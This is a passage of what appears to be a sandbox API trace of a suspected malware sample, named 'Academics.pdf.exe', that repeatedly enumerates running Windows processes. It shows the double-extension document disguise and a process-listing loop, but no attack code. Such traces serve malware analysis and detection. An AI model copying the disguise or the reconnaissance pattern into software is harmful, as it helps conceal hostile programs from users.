pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.256] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0321.257] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0321.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0321.258] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0321.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0321.259] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0321.260] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0321.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0321.261] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0321.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0321.262] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0321.263] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0321.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0321.264] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0321.265] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0321.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0321.266] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0321.267] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0321.268] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0321.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.269] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0321.270] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.271] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0321.271] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0321.272] CloseHandle (hObject=0x294) returned 1 [0321.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0321.272] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.272] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0321.273] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0321.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0321.273] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0321.273] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.274] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.275] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0321.276] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.277] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0321.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0321.278] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0321.279] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0321.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0321.280] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0321.281] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.282] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.283] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.283] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.284] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0321.285] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.286] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0321.287] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0321.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0321.288] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0321.289] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0321.290] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0321.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0321.291] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0321.292] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0321.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0321.293] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0321.294] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0321.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0321.295] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0321.296] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0321.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0321.297] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0321.298] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0321.299] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0321.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0321.300] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0321.301] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0321.302] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0321.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.303] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0321.304] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0321.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0321.305] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0321.306] CloseHandle (hObject=0x294) returned 1 [0321.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0321.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0321.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0321.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0321.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0321.306] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.306] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0321.306] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0321.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0321.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0321.306] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0321.306] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0321.308] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0321.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0321.309] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 